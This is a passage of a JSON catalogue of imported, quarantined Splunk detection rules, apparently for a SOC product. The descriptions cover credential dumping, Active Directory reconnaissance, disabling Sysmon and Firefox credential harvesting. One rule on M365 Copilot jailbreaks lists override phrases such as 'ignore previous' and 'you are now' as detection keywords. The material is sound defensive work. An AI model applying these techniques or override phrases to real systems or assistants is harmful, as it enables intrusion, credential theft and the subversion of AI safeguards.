If confirmed malicious, attackers could gain elevated privileges and persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-possible-credential-dumping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4723b92-7266-11ec-af45-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_possible_credential_dumping.yml" } }, { "id": "splunk-security-content-e4a96dfd-667a-4487-b942-ccef5a1e81e8", "type": "detection", "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", "description": "The following analytic detects the execution of the `Find-InterestingDomainAcl` cmdlet, part of the PowerView toolkit, using PowerShell Script Block Logging (EventCode=4104). This detection leverages logs to identify when this command is run, which is significant as adversaries may use it to find misconfigured or unusual Access Control Lists (ACLs) within a domain. 
If confirmed malicious, this activity could allow attackers to identify privilege escalation opportunities or weak security configurations in Active Directory, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-find-interesting-acl-with-findinterestingdomainacl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4a96dfd-667a-4487-b942-ccef5a1e81e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_find_interesting_acl_with_findinterestingdomainacl.yml" } }, { "id": "splunk-security-content-e4c73d68-794b-468d-b4d0-dac1772bbae7", "type": "detection", "name": "GetAdGroup with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdGroup` PowerShell cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate all domain groups, which adversaries may exploit for situational awareness and Active Directory discovery. Monitoring this activity is crucial as it can indicate reconnaissance efforts within the network. 
If confirmed malicious, this behavior could lead to further exploitation, such as privilege escalation or lateral movement, by providing attackers with detailed information about the domain's group structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadgroup-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4c73d68-794b-468d-b4d0-dac1772bbae7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadgroup_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-e4df4676-ea41-4397-b160-3ee0140dc332", "type": "detection", "name": "Windows Gather Victim Host Information Camera", "description": "The following analytic detects a PowerShell script that enumerates camera devices on the targeted host. This detection leverages PowerShell Script Block Logging, specifically looking for commands querying Win32_PnPEntity for camera-related information. This activity is significant as it is commonly observed in DCRat malware, which collects camera data to send to its command-and-control server. 
If confirmed malicious, this behavior could indicate an attempt to gather sensitive visual information from the host, potentially leading to privacy breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-host-information-camera.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4df4676-ea41-4397-b160-3ee0140dc332", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gather_victim_host_information_camera.yml" } }, { "id": "splunk-security-content-e51fbdb0-0be0-474f-92ea-d289f71a695e", "type": "detection", "name": "Windows Network Share Interaction Via Net", "description": "The following analytic identifies network share discovery and collection activities performed on Windows systems using the Net command. Attackers often use network share discovery to identify accessible shared resources within a network, which can be a precursor to privilege escalation or data exfiltration. 
By monitoring Windows Event Logs for the usage of the Net command to list and interact with network shares, this detection helps identify potential reconnaissance and collection activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135", "T1039" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-network-share-interaction-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e51fbdb0-0be0-474f-92ea-d289f71a695e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_network_share_interaction_via_net.yml" } }, { "id": "splunk-security-content-e52f7865-be78-46bf-b7ed-150fbe447613", "type": "detection", "name": "Windows Password Policy Discovery with Net", "description": "The following analytic identifies the execution of `net.exe` with command line arguments aimed at obtaining the computer or domain password policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gather information about Active Directory password policies. 
If confirmed malicious, this behavior could allow attackers to understand password complexity requirements, aiding in brute-force or password-guessing attacks, ultimately compromising user accounts and gaining unauthorized access to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-password-policy-discovery-with-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e52f7865-be78-46bf-b7ed-150fbe447613", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_password_policy_discovery_with_net.yml" } }, { "id": "splunk-security-content-e530beb9-9b8c-4c9b-9776-0a05521ff32d", "type": "detection", "name": "ESXi Syslog Config Change", "description": "This detection identifies changes to the syslog configuration on an ESXi host using esxcli, which may indicate an attempt to disrupt log collection and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-syslog-config-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": 
"e530beb9-9b8c-4c9b-9776-0a05521ff32d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_syslog_config_change.yml" } }, { "id": "splunk-security-content-e5928ff3-23eb-4d8b-b8a4-dcbc844fdfbe", "type": "detection", "name": "Unload Sysmon Filter Driver", "description": "The following analytic detects the use of `fltMC.exe` to unload the Sysmon driver, which stops Sysmon from collecting data. It leverages Endpoint Detection and Response (EDR) logs, focusing on process names and command-line executions. This activity is significant because disabling Sysmon can blind security monitoring, allowing malicious actions to go undetected. If confirmed malicious, this could enable attackers to execute further attacks without being logged, leading to potential data breaches, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unload-sysmon-filter-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5928ff3-23eb-4d8b-b8a4-dcbc844fdfbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unload_sysmon_filter_driver.yml" } }, { "id": "splunk-security-content-e59b5a73-32bf-4467-a585-452c36ae10c1", "type": "detection", "name": "Windows MOF Event Triggered Execution via WMI", "description": 
"The following analytic detects the execution of MOFComp.exe loading a MOF file, often triggered by cmd.exe or powershell.exe, or from unusual paths like User Profile directories. It leverages Endpoint Detection and Response (EDR) data, focusing on process names, parent processes, and command-line executions. This activity is significant as it may indicate an attacker using WMI for persistence or lateral movement. If confirmed malicious, it could allow the attacker to execute arbitrary code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mof-event-triggered-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e59b5a73-32bf-4467-a585-452c36ae10c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml" } }, { "id": "splunk-security-content-e5ab41bf-745d-4f72-a393-2611151afd8e", "type": "detection", "name": "Azure AD High Number Of Failed Authentications From Ip", "description": "The following analytic detects an IP address with 20 or more failed authentication attempts to an Azure AD tenant within 10 minutes. It leverages Azure AD SignInLogs to identify repeated failed logins from the same IP. This behavior is significant as it may indicate a brute force attack aimed at gaining unauthorized access or escalating privileges. 
If confirmed malicious, the attacker could potentially compromise user accounts, leading to unauthorized access to sensitive information and resources within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-high-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5ab41bf-745d-4f72-a393-2611151afd8e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_high_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-e5b7b5a9-e471-4be8-8c5d-4083983ba329", "type": "detection", "name": "Windows Remote Access Software RMS Registry", "description": "The following analytic detects the creation or modification of Windows registry entries related to the Remote Manipulator System (RMS) Remote Admin tool. It leverages data from the Endpoint.Registry datamodel, focusing on registry paths containing \"SYSTEM\\\\Remote Manipulator System.\" This activity is significant because RMS, while legitimate, is often abused by adversaries, such as in the Azorult malware campaigns, to gain unauthorized remote access. 
If confirmed malicious, this could allow attackers to remotely control the targeted host, leading to potential data exfiltration, system manipulation, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-access-software-rms-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5b7b5a9-e471-4be8-8c5d-4083983ba329", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_access_software_rms_registry.yml" } }, { "id": "splunk-security-content-e5c7b380-19da-42e9-9e53-0af4cd27aee3", "type": "detection", "name": "M365 Copilot Agentic Jailbreak Attack", "description": "Detects agentic AI jailbreak attempts that try to establish persistent control over M365 Copilot through rule injection, universal triggers, response automation, system overrides, and persona establishment techniques. The detection analyzes the PromptText field for keywords like \"from now on,\" \"always respond,\" \"ignore previous,\" \"new rule,\" \"override,\" and role-playing commands (e.g., \"act as,\" \"you are now\") that attempt to inject persistent instructions. 
The search computes risk by counting distinct jailbreak indicators per user session, flagging coordinated manipulation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-agentic-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5c7b380-19da-42e9-9e53-0af4cd27aee3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_agentic_jailbreak_attack.yml" } }, { "id": "splunk-security-content-e600cf1a-0bef-4426-b42e-00176d610a4d", "type": "detection", "name": "O365 OAuth App Mailbox Access via EWS", "description": "The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS) using OAuth-authenticated applications. It leverages the ClientInfoString field to identify EWS interactions and aggregates metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. Monitoring OAuth applications accessing emails through EWS is crucial for identifying potential abuse or unauthorized data access. 
If confirmed malicious, this activity could lead to unauthorized email access, data exfiltration, or further compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-oauth-app-mailbox-access-via-ews.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e600cf1a-0bef-4426-b42e-00176d610a4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_oauth_app_mailbox_access_via_ews.yml" } }, { "id": "splunk-security-content-e61918fa-9ca4-11eb-836c-acde48001122", "type": "detection", "name": "Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials", "description": "The following analytic identifies a source user failing to authenticate with 30 unique users using explicit credentials on a host. It leverages Windows Event 4648, which is generated when a process attempts an account logon by explicitly specifying account credentials. This detection is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges within an Active Directory environment. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-fail-to-authenticate-wth-explicitcredentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e61918fa-9ca4-11eb-836c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_fail_to_authenticate_wth_explicitcredentials.yml" } }, { "id": "splunk-security-content-e62c9c2e-bf51-4719-906c-3074618fcc1c", "type": "detection", "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts against an Azure AD tenant during the Multi-Factor Authentication (MFA) challenge, specifically flagged by error code 500121. It leverages Azure AD SignInLogs to detect these events. This activity is significant as it may indicate an adversary attempting to authenticate using compromised credentials on an account with MFA enabled. 
If confirmed malicious, this could suggest an ongoing effort to bypass MFA protections, potentially leading to unauthorized access and further compromise of the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e62c9c2e-bf51-4719-906c-3074618fcc1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-e633a0ef-2a6e-4ed7-b925-5ff999e5d1f0", "type": "detection", "name": "Windows AD Domain Controller Promotion", "description": "The following analytic identifies a genuine Domain Controller (DC) promotion event by detecting when a computer assigns itself the necessary Service Principal Names (SPNs) to function as a domain controller. It leverages Windows Security Event Code 4742 to monitor existing domain controllers for these changes. This activity is significant as it can help identify rogue DCs added to the network, which could indicate a DCShadow attack. 
If confirmed malicious, this could allow an attacker to manipulate Active Directory, leading to potential privilege escalation and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-controller-promotion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e633a0ef-2a6e-4ed7-b925-5ff999e5d1f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_controller_promotion.yml" } }, { "id": "splunk-security-content-e64399d4-94a8-11ec-a9da-acde48001122", "type": "detection", "name": "Windows Process With NamedPipe CommandLine", "description": "The following analytic detects processes with command lines containing named pipes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This behavior is significant as it is often used by adversaries, such as those behind the Olympic Destroyer malware, for inter-process communication post-injection, aiding in defense evasion and privilege escalation. 
If confirmed malicious, this activity could allow attackers to maintain persistence, escalate privileges, or evade defenses, potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-with-namedpipe-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e64399d4-94a8-11ec-a9da-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_with_namedpipe_commandline.yml" } }, { "id": "splunk-security-content-e651795f-b2c9-4a84-a18a-b901018a3bfa", "type": "detection", "name": "Windows RunMRU Registry Key or Value Deleted", "description": "The following analytic detects the deletion or modification of Most Recently Used (MRU) command entries stored within the Windows Registry. Adversaries often clear these registry keys, such as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, to remove forensic evidence of commands executed via the Windows Run dialog or other system utilities. This activity aims to obscure their actions, hinder incident response efforts, and evade detection. Detection focuses on monitoring for changes (deletion of values or modification of the MRUList value) to these specific registry paths, particularly when performed by unusual processes or outside of typical user behavior. 
Anomalous deletion events can indicate an attempt at defense evasion or post-exploitation cleanup by a malicious actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-runmru-registry-key-or-value-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e651795f-b2c9-4a84-a18a-b901018a3bfa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_runmru_registry_key_or_value_deleted.yml" } }, { "id": "splunk-security-content-e6d2dc61-a8b9-4b03-906c-da0ca75d71b8", "type": "detection", "name": "Detect Certify Command Line Arguments", "description": "The following analytic detects the use of Certify or Certipy tools to enumerate Active Directory Certificate Services (AD CS) environments. It leverages Endpoint Detection and Response (EDR) data, focusing on specific command-line arguments associated with these tools. This activity is significant because it indicates potential reconnaissance or exploitation attempts targeting AD CS, which could lead to unauthorized access or privilege escalation. 
If confirmed malicious, attackers could gain insights into the AD CS infrastructure, potentially compromising sensitive certificates and escalating their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certify-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6d2dc61-a8b9-4b03-906c-da0ca75d71b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certify_command_line_arguments.yml" } }, { "id": "splunk-security-content-e6f1bb1b-f441-492b-9126-902acda217da", "type": "detection", "name": "Detect S3 access from a new IP", "description": "The following analytic identifies access to an S3 bucket from a new or previously unseen remote IP address. It leverages S3 bucket-access logs, specifically focusing on successful access events (http_status=200). This activity is significant because access from unfamiliar IP addresses could indicate unauthorized access or potential data exfiltration attempts. 
If confirmed malicious, this activity could lead to unauthorized data access, data theft, or further exploitation of the compromised S3 bucket, posing a significant risk to sensitive information stored within the bucket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-s3-access-from-a-new-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6f1bb1b-f441-492b-9126-902acda217da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_s3_access_from_a_new_ip.yml" } }, { "id": "splunk-security-content-e6fc13b0-1609-11ec-b533-acde48001122", "type": "detection", "name": "Non Firefox Process Access Firefox Profile Dir", "description": "The following analytic detects non-Firefox processes accessing the Firefox profile directory, which contains sensitive user data such as login credentials, browsing history, and cookies. It leverages Windows Security Event logs, specifically event code 4663, to monitor access attempts. This activity is significant because it may indicate attempts by malware, such as RATs or trojans, to harvest user information. 
If confirmed malicious, this behavior could lead to data exfiltration, unauthorized access to user accounts, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/non-firefox-process-access-firefox-profile-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e6fc13b0-1609-11ec-b533-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/non_firefox_process_access_firefox_profile_dir.yml" } }, { "id": "splunk-security-content-e733a326-59d2-446d-b8db-14a17151aa68", "type": "detection", "name": "Detect Spike in S3 Bucket deletion", "description": "The following analytic identifies a spike in API activity related to the deletion of S3 buckets in your AWS environment. It leverages AWS CloudTrail logs to detect anomalies by comparing current deletion activity against a historical baseline. This activity is significant as unusual spikes in S3 bucket deletions could indicate malicious actions such as data exfiltration or unauthorized data destruction. If confirmed malicious, this could lead to significant data loss, disruption of services, and potential exposure of sensitive information. 
Immediate investigation is required to determine the legitimacy of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-s3-bucket-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e733a326-59d2-446d-b8db-14a17151aa68", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_s3_bucket_deletion.yml" } }, { "id": "splunk-security-content-e776d06c-9267-11eb-819b-acde48001122", "type": "detection", "name": "AWS IAM Successful Group Deletion", "description": "The following analytic identifies the successful deletion of an IAM group in AWS. It leverages CloudTrail logs to detect `DeleteGroup` events with a success status. This activity is significant as it could indicate potential changes in user permissions or access controls, which may be a precursor to further unauthorized actions. If confirmed malicious, an attacker could disrupt access management, potentially leading to privilege escalation or unauthorized access to sensitive resources. 
Analysts should review related IAM events, such as recent user additions or new group creations, to assess the broader context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-successful-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e776d06c-9267-11eb-819b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_successful_group_deletion.yml" } }, { "id": "splunk-security-content-e78a1037-4548-4072-bb1b-ad99ae416426", "type": "detection", "name": "O365 High Privilege Role Granted", "description": "The following analytic detects when high-privilege roles such as \"Exchange Administrator,\" \"SharePoint Administrator,\" or \"Global Administrator\" are granted within Office 365. It leverages O365 audit logs to identify events where these roles are assigned to any user or service account. This activity is significant for SOCs as these roles provide extensive permissions, allowing broad access and control over critical resources and data. 
If confirmed malicious, this could enable attackers to gain significant control over O365 resources, access, modify, or delete critical data, and compromise the overall security and functionality of the O365 environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-high-privilege-role-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e78a1037-4548-4072-bb1b-ad99ae416426", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_high_privilege_role_granted.yml" } }, { "id": "splunk-security-content-e7a96937-3b58-4962-8dce-538e4763cf15", "type": "detection", "name": "Linux Unix Shell Enable All SysRq Functions", "description": "The following analytic detects the execution of a command to enable all SysRq functions on a Linux system, a technique associated with the AwfulShred malware. It leverages Endpoint Detection and Response (EDR) data to identify processes executing the command to pipe bitmask '1' to /proc/sys/kernel/sysrq. This activity is significant as it can indicate an attempt to manipulate kernel system requests, which is uncommon and potentially malicious. 
